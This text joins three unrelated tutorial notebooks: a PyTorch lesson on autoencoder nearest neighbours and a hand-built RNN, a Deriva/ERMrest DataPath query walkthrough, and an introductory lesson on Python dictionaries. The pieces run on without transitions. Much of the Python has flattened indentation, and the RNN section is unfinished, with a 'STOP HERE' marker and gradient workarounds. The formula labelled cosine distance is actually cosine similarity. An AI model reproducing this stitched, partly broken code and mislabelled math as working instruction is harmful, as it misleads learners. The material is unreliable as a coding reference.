mnist_ae_act = image_ff_ae.net[2](image_ff_ae.net[1](image_ff_ae.net[0](mnist_train.data.float())))
mnist_ae_act.shape
```
Let's pick some example image
```
img_idx = 15 #between 0 and 60000-1
plt.imshow(mnist_train.data[img_idx])
```
Get the target image activation
```
target_img_act = mnist_ae_act[img_idx]
target_img_act
```
We will use the cosine distance between two vectors to find the nearest neighbors.
**Question**: Can you think of an elegant matrix-operation way of implementing this (so it can also run on a GPU)?
**Warning**: Always keep an eye out for memory usage. The full matrix of pairwise distances can be very large. Work with a subset of the data (even 100 images) if that's the case.
```
#to save memory, look at only first N images (1000 here)
mnist_ae_act = mnist_ae_act[0:1000, :]
```
The cosine distance between two points, $\vec{x}_i, \vec{x}_j$ is:
$$d_{ij} = \frac{\vec{x}_i \cdot \vec{x}_j}{\lVert \vec{x}_i \rVert \, \lVert \vec{x}_j \rVert}$$
Now we can first normalize all the activation vectors so they have length 1.
```
torch.pow(mnist_ae_act, 2).sum(dim=1).shape
```
We can't directly divide a tensor of shape [1000, 50] (the activations) by a tensor of shape [1000] (the norms).
So we first have to unsqueeze (add an extra dimension) to get shape [1000, 1] and then broadcast/expand it to the shape of the target tensor.
We should check that the first row contains the squared length of the first image's activations (the square root comes in the next step).
```
torch.pow(mnist_ae_act, 2).sum(dim=1).unsqueeze(1).expand_as(mnist_ae_act)
```
Now we can divide by the norm (don't forget the sqrt).
```
mnist_ae_act_norm = mnist_ae_act / torch.pow(torch.pow(mnist_ae_act, 2).sum(dim=1).unsqueeze(1).expand_as(mnist_ae_act), 0.5)
```
Let's check an example.
```
mnist_ae_act[10]
torch.pow(torch.pow(mnist_ae_act[10], 2).sum(), 0.5)
mnist_ae_act[10] / torch.pow(torch.pow(mnist_ae_act[10], 2).sum(), 0.5)
mnist_ae_act_norm[10]
```
Good! They are the same. We have confidence that we are normalizing the activation vectors correctly.
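For reference, torch ships this normalization as a built-in; here is a cross-check against our manual version on a small stand-in tensor (our example, not part of the original notebook):

```python
import torch
import torch.nn.functional as F

torch.manual_seed(0)
x = torch.rand(5, 50)  # stand-in for the activation matrix

manual = x / torch.pow(torch.pow(x, 2).sum(dim=1).unsqueeze(1).expand_as(x), 0.5)
builtin = F.normalize(x, p=2, dim=1)  # built-in L2 normalization along dim 1

print(torch.allclose(manual, builtin, atol=1e-6))  # True
```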
So now the cosine distance is:
$$d_{ij} = \vec{x}_i \cdot \vec{x}_j$$
since all the vectors are of unit length.
**Question**: How would you compute this using matrix operations?
```
mnist_ae_act_norm.transpose(1, 0).shape
mnist_ae_act_norm.shape
ae_pairwise_cosine = torch.mm(mnist_ae_act_norm, mnist_ae_act_norm.transpose(1,0))
ae_pairwise_cosine.shape
ae_pairwise_cosine[0].shape
img_idx = 18 #between 0 and 1000-1 (we kept only the first 1000 images above)
plt.imshow(mnist_train.data[img_idx])
plt.title("Target image")
#find closest image
top5 = torch.sort(ae_pairwise_cosine[img_idx], descending=True) #or use argsort
top5_vals = top5.values[0:5]
top5_idx = top5.indices[0:5]
for i, idx in enumerate(top5_idx):
plt.figure()
plt.imshow(mnist_train.data[idx])
if i==0:
plt.title("Sanity check : same as input")
else:
plt.title(f"match {i} : cosine = {top5_vals[i]}")
```
While this is a simple dataset and a simple autoencoder, we already get some pretty good anecdotal similarity matches. There are many variations on autoencoders: swapping in different layers, adding noise to the inputs (denoising autoencoders), adding sparsity penalties on the hidden activations to encourage sparse representations, and probabilistic graphical models called variational autoencoders.
Delete activations and cosine distances to save memory
```
mnist_ae_act = None
mnist_ae_act_norm = None
ae_pairwise_cosine = None
```
# Conclusion
By now, you have had quite some experience with writing your own neural networks and introspecting into what they are doing. We still haven't touched topics like recurrent neural networks, seq2seq models and more modern applications. They will get added to this notebook so if you are interested, please revisit the repo.
## Future Items
Real problems
MNIST + autoencoder (convnet)
Trip Classification:
Maybe?
Transfer Learning
RNN toy problems
Linear trend + noise
Different data structuring strategies
Quadratic trend + noise
LSTM/GRUs for same problems
Seq2Seq examples
RNN Autoencoder
What data?
```
STOP HERE
```
### Recurrent Neural Networks (In progress)
**Note**: You might have run into memory issues by now. Everything below is self contained so if you want to reset the notebook and start from the cell below, it should work.
```
import torch
import torch.nn as nn
import torch.optim as optim
import matplotlib.pylab as plt
import pandas as pd
import numpy as np
from sklearn.neural_network import MLPClassifier, MLPRegressor
import copy
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print(device)
```
As before, let's generate some toy data.
```
def generate_rnn_data(N_examples=1000, noise_var = 0.1, lag=1, seed=None):
    if seed is not None:
        np.random.seed(seed)
    #note: np.random.normal takes the standard deviation, and needs a size to draw one sample per point
    ts = 4 + 3*np.arange(N_examples) + np.random.normal(0, noise_var, N_examples)
features = ts[0:len(ts)-lag]
target = ts[lag:]
return features, target
features, target = generate_rnn_data()
```
This data is possibly the simplest time-series one could pick (apart from a constant value): a simple linear trend with a tiny bit of Gaussian noise. Note that this is a **non-stationary** series!
```
plt.plot(features, 'p')
```
We want to predict the series at time t+1 given the value at time t (and history).
Of course, we could try using a feed-forward network for this. But instead, we'll use this to introduce recurrent neural networks.
Recall that the simplest possible recurrent neural network has a hidden layer that evolves in time, $h_t$, inputs $x_t$ and outputs $y_t$.
$$h_t = \sigma(W_{hh} h_{t-1} + W_{hx} x_t + b_h)$$
with outputs:
$$y_t = W_{yh} h_t + b_y$$
Since the output is an unbounded real value, we won't have an activation on the output.
Let's write our simple RNN. This is not general - we don't have the flexibility of adding more layers (as discussed in the lecture), bidirectionality, etc. - but we are in experimental mode so that's okay. Eventually, you can use PyTorch's built-in `torch.nn.RNN` class.
```
N_input = 1 #will pass only one value as input
N_output = 1 #will predict one value
N_hidden = 32 #number of hidden dimensions to use
hidden_activation = nn.ReLU()
#define weights and biases
w_hh = nn.Parameter(data = torch.Tensor(N_hidden, N_hidden), requires_grad = True)
w_hx = nn.Parameter(data = torch.Tensor(N_hidden, N_input), requires_grad = True)
w_yh = nn.Parameter(data = torch.Tensor(N_output, N_hidden), requires_grad = True)
b_h = nn.Parameter(data = torch.Tensor(N_hidden, 1), requires_grad = True)
b_y = nn.Parameter(data = torch.Tensor(N_output, 1), requires_grad = True)
#initialize weights and biases (in-place)
nn.init.kaiming_uniform_(w_hh)
nn.init.kaiming_uniform_(w_hx)
nn.init.kaiming_uniform_(w_yh)
nn.init.zeros_(b_h)
nn.init.zeros_(b_y)
hidden_act = hidden_activation(torch.mm(w_hx, torch.ones(N_input, 1)) + \
torch.mm(w_hh, torch.ones(N_hidden, 1)) + \
b_h)
print(hidden_act.shape)
output = (torch.mm(w_yh, hidden_act) + b_y)
print(output.shape)
```
But the input we'll be passing will be a time-series
```
inp_ts = torch.Tensor([1,2,3]).unsqueeze(1).unsqueeze(2)
print(inp_ts.shape)
inp_ts[0]
inp_ts[0].shape
hidden_act = torch.zeros(N_hidden, 1)
#-----------first iter--------
hidden_act = hidden_activation(torch.mm(w_hx, inp_ts[0]) + \
torch.mm(w_hh, hidden_act) + \
b_h)
print(hidden_act.shape)
output = (torch.mm(w_yh, hidden_act) + b_y)
print(output)
#-----------second iter--------
hidden_act = hidden_activation(torch.mm(w_hx, inp_ts[1]) + \
torch.mm(w_hh, hidden_act) + \
b_h)
print(hidden_act.shape)
output = (torch.mm(w_yh, hidden_act) + b_y)
print(output)
#-----------third iter--------
hidden_act = hidden_activation(torch.mm(w_hx, inp_ts[2]) + \
torch.mm(w_hh, hidden_act) + \
b_h)
print(hidden_act.shape)
output = (torch.mm(w_yh, hidden_act) + b_y)
print(output)
hidden_act = torch.zeros(N_hidden, 1)
for x in inp_ts: #input time-series
hidden_act = hidden_activation(torch.mm(w_hx, x) + \
torch.mm(w_hh, hidden_act) + \
b_h)
print(hidden_act.shape)
output = (torch.mm(w_yh, hidden_act) + b_y)
print(output)
class RNN(nn.Module):
def __init__(self, N_input, N_hidden, N_output, hidden_activation):
super(RNN, self).__init__()
self.N_input = N_input
self.N_hidden = N_hidden
self.N_output = N_output
self.hidden_activation = hidden_activation
#define weights and biases
self.w_hh = nn.Parameter(data = torch.Tensor(N_hidden, N_hidden), requires_grad = True)
self.w_hx = nn.Parameter(data = torch.Tensor(N_hidden, N_input), requires_grad = True)
self.w_yh = nn.Parameter(data = torch.Tensor(N_output, N_hidden), requires_grad = True)
self.b_h = nn.Parameter(data = torch.Tensor(N_hidden, 1), requires_grad = True)
self.b_y = nn.Parameter(data = torch.Tensor(N_output, 1), requires_grad = True)
self.init_weights()
def init_weights(self):
nn.init.kaiming_uniform_(self.w_hh)
nn.init.kaiming_uniform_(self.w_hx)
nn.init.kaiming_uniform_(self.w_yh)
nn.init.zeros_(self.b_h)
nn.init.zeros_(self.b_y)
def forward(self, inp_ts, hidden_act=None):
if hidden_act is None:
#initialize to zero if hidden not passed
hidden_act = torch.zeros(self.N_hidden, 1)
output_vals = torch.tensor([])
for x in inp_ts: #input time-series
hidden_act = self.hidden_activation(torch.mm(self.w_hx, x) + \
torch.mm(self.w_hh, hidden_act) + \
self.b_h)
output = (torch.mm(self.w_yh, hidden_act) + self.b_y)
output_vals = torch.cat((output_vals, output))
return output_vals, hidden_act
rnn = RNN(N_input, N_hidden, N_output, hidden_activation)
output_vals, hidden_act = rnn(inp_ts)
print(output_vals)
print("---------")
print(hidden_act)
```
So far so good. Now how do we actually tune the weights? As before, we want to compute a loss between the predictions from the RNN and the labels. Once we have a loss, we can do the usual backpropagation and gradient descent.
Recall that our "features" are:
$$x_1, x_2, x_3\ldots$$
Our "targets" are:
$$x_2, x_3, x_4 \ldots$$
if the lag argument in generate_rnn_data is 1. More generally, it would be:
$$x_{1+\text{lag}}, x_{2+\text{lag}}, x_{3+\text{lag}}, \ldots$$
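Concretely, for a toy series and `lag=2`, the feature/target alignment looks like this:

```python
ts = [10, 11, 12, 13, 14, 15]
lag = 2
features = ts[0:len(ts) - lag]  # all but the last `lag` values
target = ts[lag:]               # the series shifted forward by `lag`
print(features)
print(target)
```

Each feature at index `i` is paired with the value `lag` steps later as its prediction target.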
Now, let's focus on the operational aspects for a second. In principle, you would first feed $x_1$ as an input, generate an **estimate** for $\hat{x}_2$ as the output.
Ideally, this would be close to the actual value $x_2$ but that doesn't have to be the case, especially when the weights haven't been tuned yet. Now, for the second step, we need to input $x_2$ to the RNN. The question is whether we should use $\hat{x}_2$ or $x_2$.
In real life, one can imagine forecasting a time-series into the future given values up to time t. In that case, we would have to feed the prediction made at time t, $\hat{x}_{t+1}$, as the input at the next time-step, since we don't know the true $x_{t+1}$.
The problem with this approach is that errors start compounding really fast. While we might be a bit off at $t+1$, if our prediction $\hat{x}_{t+1}$ is inaccurate, then our prediction $\hat{x}_{t+2}$ will be even worse and so on.
In our case, we'll use what's called **teacher forcing**. We'll always feed the actual known $x_t$ at time-step t instead of the prediction from the previous time-step, $\hat{x}_t$.
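The difference between the two feeding strategies can be sketched with a stand-in one-step model (a deliberately imperfect predictor, not the RNN above): with teacher forcing the per-step error stays bounded, while free-running predictions drift further and further from the true series.

```python
def step_model(x):
    # Stand-in for one model step: slightly wrong on purpose
    # (the true process below is x -> x + 3)
    return 1.05 * x + 3

series = [float(t) for t in range(0, 30, 3)]  # 0.0, 3.0, ..., 27.0

# Teacher forcing: always feed the *true* value at each step
tf_preds = [step_model(x) for x in series[:-1]]

# Free running: feed the model's *own* previous prediction
fr_preds, x = [], series[0]
for _ in series[:-1]:
    x = step_model(x)
    fr_preds.append(x)

tf_err = [abs(p - t) for p, t in zip(tf_preds, series[1:])]
fr_err = [abs(p - t) for p, t in zip(fr_preds, series[1:])]
print(tf_err[-1], fr_err[-1])  # free-running error has compounded
```

The final free-running error is several times larger than the teacher-forced one, even though both use the same (slightly wrong) model.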
**Question**: Split the features and target into train and test sets.
```
N_examples = len(features)
TRAIN_PERC = 0.70
TRAIN_SPLIT = int(TRAIN_PERC * N_examples)
features_train = features[:TRAIN_SPLIT]
target_train = target[:TRAIN_SPLIT]
features_test = features[TRAIN_SPLIT:]
target_test = target[TRAIN_SPLIT:]
plt.plot(np.concatenate([features_train, features_test]))
plt.plot(features_train, label='train')
plt.plot(np.arange(len(features_train), len(features)), features_test, label='test')
plt.legend()
N_input = 1 #will pass only one value as input
N_output = 1 #will predict one value
N_hidden = 32 #number of hidden dimensions to use
hidden_activation = nn.ReLU()
rnn = RNN(N_input, N_hidden, N_output, hidden_activation)
criterion = nn.MSELoss()
# Create the optimizer *after* the RNN so it tracks this instance's parameters
optimizer = optim.Adam(rnn.parameters(), lr=1e-3)
features_train = torch.tensor(features_train).unsqueeze(1).unsqueeze(2)
target_train = torch.tensor(target_train).unsqueeze(1).unsqueeze(2)
features_test = torch.tensor(features_test).unsqueeze(1).unsqueeze(2)
target_test = torch.tensor(target_test).unsqueeze(1).unsqueeze(2)
output_vals, hidden_act = rnn(features_train.float())
print(len(output_vals))
print(len(target_train))
# Use `output_vals` directly: re-wrapping it in `torch.tensor(...)` would
# detach it from the computation graph and silently break backpropagation
loss = criterion(output_vals, target_train.squeeze(2).float())
print(loss)
optimizer.zero_grad()
loss.backward()
optimizer.step()
```
We can now put all these ingredients together
```
N_input = 1 #will pass only one value as input
N_output = 1 #will predict one value
N_hidden = 4 #number of hidden dimensions to use
hidden_activation = nn.Tanh()
rnn = RNN(N_input, N_hidden, N_output, hidden_activation)
criterion = nn.MSELoss()
optimizer = optim.Adam(rnn.parameters(), lr=1e-1)
N_epochs = 10000
hidden_act = None
for n in range(N_epochs):
output_vals, hidden_act = rnn(features_train.float(), hidden_act = None)
loss = criterion(output_vals, target_train.squeeze(1).float())
#loss.requires_grad = True
optimizer.zero_grad()
loss.backward()
optimizer.step()
if n % 100 == 0:
print(rnn.w_yh.grad)
print(f'loss = {loss}')
print(output_vals.requires_grad)
output_vals.shape
criterion(output_vals, target_train.squeeze(1).float())
features_train[0:10]
plt.plot([i.item() for i in output_vals])
plt.plot([i[0] for i in target_train.numpy()])
rnn.w_hh.grad
optimizer.zero_grad()
loss.requires_grad = True
loss.backward()
optimizer.step()
rnn.w_hh
rnn.w_hx.grad
```
# DataPath Example 4
This notebook covers somewhat more advanced examples for using `DataPath`s. It assumes that you understand
the concepts presented in the previous example notebooks.
You should also read the ERMrest documentation and the derivapy wiki. There are more advanced concepts in this notebook that are demonstrated but not fully (re)explained here, as the concepts are explained in other documentation.
## Example Data Model
The examples require that you understand a little bit about the example catalog data model, which in this case manages data for biological experiments.
### Key tables
- `'dataset'` : represents a unit of data usually for a study or set of experiments;
- `'biosample'` : a biosample (describes biological details of a specimen);
- `'replicate'` : a replicate (describes both bio- and technical-replicates);
- `'experiment'` : a bioassay (any type of experiment or assay; e.g., imaging, RNA-seq, ChIP-seq, etc.).
### Relationships
- `dataset <- biosample`: A dataset may have one to many biosamples. I.e., there is a
foreign key reference from biosample to dataset.
- `dataset <- experiment`: A dataset may have one to many experiments. I.e., there
is a foreign key reference from experiment to dataset.
- `experiment <- replicate`: An experiment may have one to many replicates. I.e., there is a
foreign key reference from replicate to experiment.
```
# Import deriva modules and pandas DataFrame (for use in examples only)
from deriva.core import ErmrestCatalog, get_credential
from pandas import DataFrame
# Connect with the deriva catalog
protocol = 'https'
hostname = 'www.facebase.org'
catalog_number = 1
credential = None
# If you need to authenticate, use Deriva Auth agent and get the credential
# credential = get_credential(hostname)
catalog = ErmrestCatalog(protocol, hostname, catalog_number, credential)
# Get the path builder interface for this catalog
pb = catalog.getPathBuilder()
# Get some local variable handles to tables for convenience
dataset = pb.isa.dataset
experiment = pb.isa.experiment
biosample = pb.isa.biosample
replicate = pb.isa.replicate
```
## Implicit DataPaths
**Proceed with caution**
For compactness, `Table` objects (and `TableAlias` objects) provide `DataPath`-like methods. E.g., `link(...)`, `filter(...)`, and `entities(...)`, which will implicitly create `DataPath`s rooted at the table and return the newly created path. These operations `return` the new `DataPath` rather than mutating the `Table` (or `TableAlias`) objects.
```
entities = dataset.filter(dataset.released == True).entities()
len(entities)
```
### DataPath-like methods
The `DataPath`-like methods on `Table`s are essentially "wrapper" functions over the implicitly generated `DataPath` rooted at the `Table` instance. The wrappers include, `link(...)`, `filter(...)`, `entities(...)`, `attributes(...)`, `aggregates(...)`, and `groupby(...)`.
## Attribute Examples
### Example: selecting all columns of a table instance
Passing a table (or table instance) object to the `attributes(...)` method will project all (i.e., `*`) of its attributes.
```
path = dataset.alias('D').path
path.link(experiment).link(replicate)
results = path.attributes(path.D)
print(len(results))
print(results.uri)
```
It is important to remember that the `attributes(...)` method returns a result set based on the entity type of the last element of the path. In this example, that means the number of results will be determined by the number of unique rows in the replicate table instance in the path created above, since the last link method used the replicate table.
### Example: selecting from multiple table instances
More than one table instance may be selected in this manner and it can be mixed and matched with columns from other tables instances.
```
results = path.attributes(path.D,
path.experiment.experiment_type,
path.replicate)
print(len(results))
print(results.uri)
```
If you want to base the results on a different entity, you can introduce a table instance alias into the end of the path, before calling the attributes function. In this case, even though we are asking for the same attributes, we are getting the set of datasets, not the set of replicates. Also, since we are including the attributes from dataset in our query, we know that we will not be seeing any duplicate rows.
```
results = path.D.attributes(path.D,
path.experiment.experiment_type,
path.replicate)
print(len(results))
print(results.uri)
```
## Filtering Examples
### Example: filter on `null` attribute
To test for a `null` attribute value, do an equality comparison against the `None` identity.
```
path = dataset.link(experiment).filter(experiment.molecule_type == None)
print(path.uri)
print(len(path.entities()))
```
### Example: advanced text filters
Deriva supports advanced text filters for regular expressions (`regexp`), case-insensitive regexp (`ciregexp`), and text search (`ts`). You may have to review your text and full-text indexes in your ERMrest catalog before using these features.
```
path = dataset.filter(dataset.description.ciregexp('palate'))
print(path.uri)
print(len(path.entities()))
```
### Example: negate a filter
Use the "inverse" ('`~`') operator to negate a filter. Negation works against simple comparison filters as demonstrated above, as well as on the logical operators to be discussed next. You must wrap the comparison or logical operators in extra parentheses to use the negate operation, e.g., "`~ (...)`".
```
path = dataset.filter( ~ (dataset.description.ciregexp('palate')) )
print(path.uri)
print(len(path.entities()))
```
### Example: filters with logical operators
This example shows how to combine two comparisons with a conjunction (i.e., the `and` operator). Because Python's logical-and (`and`) keyword cannot be overloaded, we instead overload the bitwise-and (`&`) operator. This approach has become customary among many similar data access libraries.
```
path = dataset.link(biosample).filter(
((biosample.species == 'NCBITAXON:10090') & (biosample.anatomy == 'UBERON:0002490')))
print(path.uri)
DataFrame(path.entities())
```
### Example: combine conjunction and disjunctions in filters
Similar to the prior example, the filters allow combining conjunctive and disjunctive operators. Like the bitwise-and operator, we also overload the bitwise-or (`|`) operator because the logical-or (`or`) operator cannot be overloaded.
```
path = dataset.link(biosample).filter(
((biosample.species == 'NCBITAXON:10090') & (biosample.anatomy == 'UBERON:0002490')) |
((biosample.specimen == 'FACEBASE:1-4GNR') & (biosample.stage == 'FACEBASE:1-4GJA')))
print(path.uri)
DataFrame(path.entities())
```
### Example: filtering at different stages of the path
Filtering a path does not have to be done at the end of a path. In fact, the initial intention of the ERMrest URI was to mimic "RESTful" semantics where a RESTful "resource" is identified, then filtered, then a "sub-resource" is identified, and then filtered, and so on.
```
path = dataset.filter(dataset.release_date >= '2017-01-01') \
.link(experiment).filter(experiment.experiment_type == 'OBI:0001271') \
.link(replicate).filter(replicate.bioreplicate_number == 1)
print(path.uri)
DataFrame(path.entities())
```
## Linking Examples
### Example: explicit column links
Up until now, the examples have shown how to link entities via _implicit_ join predicates. That is, we knew there existed a foreign key reference constraint between foreign keys of one entity and keys of another entity. We needed only to ask ERMrest to link the entities in order to get the linked set.
The problem with implicit links is that they become _ambiguous_ when there is more than one foreign key reference between the tables. To support these situations, ERMrest and the `DataPath`'s `link(...)` method can specify the columns to use for the link condition, explicitly.
The structure of the `on` clause is:
- an equality comparison operation where
- the _left_ operand is a column of the _left_ table instance which is also the path _context_ before the link method is called, and
- the _right_ operand is a column of the _right_ table instance which is the table _to be linked_ to the path.
```
path = dataset.link(experiment, on=(dataset.RID==experiment.dataset))
print(path.uri)
```
**IMPORTANT** Not all tables are related by foreign key references. ERMrest does not allow arbitrary relational joins. Tables must be related by a foreign key reference in order to link them in a data path.
```
DataFrame(path.entities().fetch(limit=3))
```
### Example: explicit column links combined with table aliasing
As usual, table instances are generated automatically unless we provide a table alias.
```
path = dataset.link(biosample.alias('S'), on=(dataset.RID==biosample.dataset))
print(path.uri)
```
Notice that we cannot use the alias right away in the `on` clause because it was not _bound_ to the path until _after_ the `link(...)` operation was performed.
### Example: links with "outer join" semantics
Up until now, the examples have shown "`link`s" with _inner join_ semantics. _Outer join_ semantics can be expressed as part of explicit column links, and _only_ when using explicit column links.
The `link(...)` method accepts a "`join_type`" parameter, i.e., "`.link(... join_type=TYPE)`", where _TYPE_ may be `'left'`, `'right'`, `'full'`, and defaults to `''` which indicates inner join type.
By '`left`' outer joining in the links from `'dataset'` to `'experiment'` and to `'biosample'`, and then resetting the context of the path back to `'dataset'`, the following path gives us a reference to `'dataset'` entities _whether or not_ they have any experiments or biosamples.
```
# Notice in between `link`s that we have to reset the context back to `dataset` so that the
# second join is also left joined from the dataset table instance.
path = dataset.link(experiment.alias('E'), on=dataset.RID==experiment.dataset, join_type='left') \
.dataset \
    .link(biosample.alias('S'), on=dataset.RID==biosample.dataset, join_type='left')
# Notice that we have to perform the attribute fetch from the context of the `path.dataset`
# table instance.
results = path.dataset.attributes(path.dataset.RID,
path.dataset.title,
path.E.experiment_type,
path.S.species)
print(results.uri)
len(results)
```
We can see above that we have a full set of datasets _whether or not_ they have any experiments with biosamples. For further evidence, we can convert to a DataFrame and look at a slice of its entries. Note that the 'experiment_type' and 'species' attributes do not exist for some results (i.e., `NaN`) because those datasets had no matching rows to satisfy the join condition.
```
DataFrame(results)[:10]
```
## Faceting Examples
You may have noticed that in the examples above, the 'species' and 'experiment_type' attributes are identifiers ('CURIE's to be precise). We may want to construct filters on our datasets based on these categories. This can be used for "faceted search" modes and can be useful even within the context of programmatic access to data in the catalog.
### Example: faceting on "related" tables
Let's say we want to find all of the biosamples in our catalog where their species are 'Mus musculus' and their age stage are 'E10.5'.
We need to extend our understanding of the data model with the following tables that are related to '`biosample`'.
- `isa.biosample.species -> vocab.species`: the biosample table has a foreign key reference to the '`species`' table.
- `isa.biosample.stage -> vocab.stage`: the biosample table has a foreign key reference to the '`stage`' table.
We may say that `species` and `stage` are _related_ to the `biosample` table in the sense that `biosample` has a direct foreign key relationship from it to them.
For convenience, we will get local variables for the species and stage tables.
```
species = pb.vocab.species
stage = pb.vocab.stage
```
First, let's link samples with species and filter on the term "Mus musculus" (i.e., "mouse").
```
# Here we have to use the container `column_definitions` because `name` is reserved
path = biosample.alias('S').link(species).filter(species.column_definitions['name'] == 'Mus musculus')
print(path.uri)
```
Now the _context_ of the path is the `species` table instance, but we need to link from the `biosample` to the age `stage` table.
To do so, we reference the `biosample` table instance, in this case using its alias `S`. Then we link off of that table instance which updates the `path` itself.
```
path.S.link(stage).filter(stage.column_definitions['name'] == 'E10.5')
print(path.uri)
```
Now, the path _context_ is the age `stage` table instance, but we wanted to get the entities for the `biosample` table. To do so, again we will reference the `biosample` table instance by the alias `S` we used. From there, we will call the `entities(...)` method to get the samples.
```
results = path.S.attributes(path.S.RID,
path.S.collection_date,
path.species.column_definitions['name'].alias('species'),
path.species.column_definitions['uri'].alias('species_uri'),
path.stage.column_definitions['name'].alias('stage'),
path.stage.column_definitions['uri'].alias('stage_uri'))
print(results.uri)
DataFrame(results)
```
## Grouping Examples
Now suppose you would like to aggregate all of the vocabulary terms associated with a Dataset. Here, we examine what happens when you have a model such that `dataset <- dataset_VOCAB -> VOCAB` where `VOCAB` is a placeholder for a table that includes a vocabulary term set. These tables typically have a `name` column for the human-readable preferred label to go along with the formal URI or CURIE of the concept class.
```
# We need to import the `ArrayD` aggregate function for this example.
from deriva.core.datapath import ArrayD
# For convenience, get python objects for the additional tables.
dataset_organism = pb.isa.dataset_organism
dataset_experiment_type = pb.isa.dataset_experiment_type
species = pb.vocab.species
experiment_type = pb.vocab.experiment_type
# Start by doing a couple left outer joins on the dataset-term association tables, then link
# (i.e., inner join) the associated vocabulary term table, then reset the context back to the
# dataset table.
path = dataset.link(dataset_organism, on=dataset.id==dataset_organism.dataset_id, join_type='left') \
.link(species) \
.dataset \
.link(dataset_experiment_type, on=dataset.id==dataset_experiment_type.dataset_id, join_type='left') \
.link(experiment_type)
# Again, notice that we reset the context to the `dataset` table alias so that we will retrieve
# dataset entities based on the groupings to be defined next. For the groupby key we will use the
# dataset.RID, but for this example any primary key would work. Then we will get aggregate arrays
# of the linked vocabulary tables.
results = path.dataset.groupby(dataset.RID).attributes(
dataset.title,
ArrayD(path.species.column_definitions['name']).alias('species'),
ArrayD(path.experiment_type.column_definitions['name']).alias('experiment_type')
)
#results = path.dataset.entities()
print(results.uri)
print(len(results))
DataFrame(results.fetch(limit=20))
```
# Dictionaries
---
[Watch a walk-through of this lesson on YouTube]()
## Questions:
- How can I organize data to store values associated with labels?
- How do I work with such data structures?
## Learning Objectives:
- Be able to store data in dictionaries
- Be able to retrieve specific items from dictionaries
---
## Dictionaries are mappings
- Python provides a valuable data type called the **dictionary** (often abbreviated as "dict")
- Dictionaries are *collections* — Python data types that store multiple values — like lists or strings
- However, dictionaries are *mappings*. Like a traditional dictionary that contains a word, followed by a definition, dictionaries are pairings of **keys** and **values**
- A dictionary can be defined using curly braces that specify key-value mappings using the colon (`:`)
- For example, the following defines a dictionary with four keys (`First Name`, `Last Name`, etc.), each with an associated value:
~~~python
my_info = {'First Name':'Annikki',
'Last Name':'Bogdana',
'Age':15,
'Height':1.66}
~~~
- Like lists, dictionaries can contain a mixture of data types.
- Dictionary **keys** must be an *immutable* type, such as a string or number (int or float). This is because dictionaries are organized by keys, and once a key is defined, it cannot be changed.
- Dictionary **values** can be any type.
The values in a dictionary are accessed using their keys inside square brackets:
~~~python
my_info['First Name']
~~~
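- For example, a tuple can serve as a key (it is immutable), while trying to use a list as a key raises a `TypeError`:

```python
coords = {(49.28, -123.12): 'Vancouver'}  # tuple key: immutable, so allowed
print(coords[(49.28, -123.12)])

try:
    bad = {[49.28, -123.12]: 'Vancouver'}  # list key: mutable, not allowed
except TypeError as error:
    print('TypeError:', error)
```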
## Why Dictionaries?
- Dictionaries provide a convenient way for labelling data. For example, in the previous lesson on lists, we used an example of a list of life expectancies for a country (Canada) for different years:
~~~python
life_exp = [48.1, 56.6, 64.0, 71.0, 75.2, 79.2]
~~~
- One limitation of using a list like this is that we don't know what years the values are associated with. For example, in what year was 48.1 the average life expectancy?
- Dictionaries solve this problem, because we can use the keys to label the data. For example, we can define the following dictionary in which keys indicate years, and values are life expectancies:
~~~python
life_exp = {1900:48.1, 1920:56.6, 1940:64.0, 1960:71.0, 1980:75.2, 2000:79.2}
~~~
- In defining a dictionary, we use **curly braces {}**
- We associate keys and values with a colon **`:`**
- Now we can see the life expectancy associated with a given year like so:
~~~python
life_exp[1940]
~~~
- What happens if we ask for a key that doesn't exist?
~~~python
life_exp[2021]
~~~
- We get a specific type of error called a KeyError, which tells us that the key isn't defined
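- If you want to look up a key without risking a `KeyError`, the `.get()` method returns `None` (or a default you supply) for missing keys:

```python
life_exp = {1900: 48.1, 1920: 56.6, 1940: 64.0, 1960: 71.0, 1980: 75.2, 2000: 79.2}
print(life_exp.get(2021))         # None -- no error raised
print(life_exp.get(2021, 'n/a'))  # 'n/a' -- a default of our choosing
```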
## Dictionaries are mutable
- We previously discussed the difference between *immutable* types like strings — whose contents cannot be changed — and *mutable* types like lists — which can be changed. Dictionaries are mutable.
- This means we can:
- add new key:value pairs after the dictionary is first defined, and
- modify the values associated with existing keys
- For example, we can add a new key:value pair by using the dict name plus square brackets to specify a new key, followed by `=` to assign the value to this key:
~~~python
life_exp[2020] = 83.2
print(life_exp)
~~~
- We can also change the value for an existing key in the same way. In the example above we assigned the wrong value to 2020; it should be 82.3 not 83.2. So we can fix it like this:
~~~python
life_exp[2020] = 82.3
print(life_exp)
~~~
- Note that Python doesn't warn you if you're overwriting a value associated with an existing key.
### Dictionary keys cannot be renamed
- Although dictionaries are mutable, we can't rename dictionary *keys*. However, we can delete existing entries and create new ones if we need to.
- For example, below we add a life expectancy value for the year 2040, but we mistakenly make the key a string instead of an integer like the other, existing keys:
~~~python
life_exp['2040'] = 85.1
print(life_exp)
~~~
- We can add another entry using the correct (integer) key, but this doesn't delete the old entry:
~~~python
life_exp[2040] = 85.1
print(life_exp)
~~~
- Alternatively, rather than entering the new value manually, we can copy it from the value corresponding to the original (incorrect) key:
~~~python
life_exp[2040] = life_exp['2040']
print(life_exp)
~~~
- Whether we manually enter a new key:value pair, or copy a value from an existing dictionary entry, we still retain the original dictionary entry (in this case, `'2040'`)
### Removing dictionary entries
- We can remove a dictionary entry with the **`del`** statement. `del` is a Python *statement* (not a function or method), so it is followed by a space rather than parentheses:
~~~python
del life_exp['2040']
print(life_exp)
~~~
- We can alternatively remove a dictionary item using the **`.pop()`** method, as we saw last time for lists.
- The key for the dictionary entry you wish to delete is the argument you pass to `.pop()`
- In this example we first create an erroneous entry, then remove it with `.pop()`:
```python
# Create incorrect entry
life_exp[200] = 79.2
print(life_exp)
# Remove incorrect entry
life_exp.pop(200)
print(life_exp)
```
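- Combining these ideas, a mis-typed key can be "renamed" in a single step, because `.pop()` returns the removed value:

```python
life_exp = {1900: 48.1, '2040': 85.1}  # '2040' was mistakenly entered as a string
life_exp[2040] = life_exp.pop('2040')  # move the value to the correct integer key
print(life_exp)
```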
## Dictionaries are unordered
- Both strings and lists are *ordered* — the items exist in a string or list in a specific order. This is why we can use integers to index string or list items based on their position
- Dictionaries, in contrast, do not support positional indexing. (Since Python 3.7, dictionaries preserve insertion order, but you still can't access values by position, only by their keys.) For example, this will fail:
~~~python
life_exp[0]
~~~
